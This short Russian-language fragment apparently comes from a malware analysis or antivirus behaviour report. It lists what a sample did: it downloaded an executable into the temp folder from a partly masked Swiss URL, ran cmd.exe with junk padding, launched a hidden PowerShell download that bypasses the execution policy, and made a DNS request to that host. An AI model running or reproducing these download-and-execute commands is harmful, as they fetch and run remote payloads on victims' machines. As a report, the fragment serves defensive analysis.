Техническая информация
- http://ch####.##utiques-gruyeres.ch/services/consulting/about.php как %temp%\loiu1ns.exe
- '<SYSTEM32>\cmd.exe' nHBJGajskdbashjnKnasdnjsadguyqwfgyudnjksalkdnklsaxnklasnxkasknxx /c powershell -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://ch####.##utiques-gruyere...
- DNS ASK ch####.##utiques-gruyeres.ch
- '<SYSTEM32>\cmd.exe' nHBJGajskdbashjnKnasdnjsadguyqwfgyudnjksalkdnklsaxnklasnxkasknxx /c powershell -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://ch####.##utiques-gruyere...' (со скрытым окном)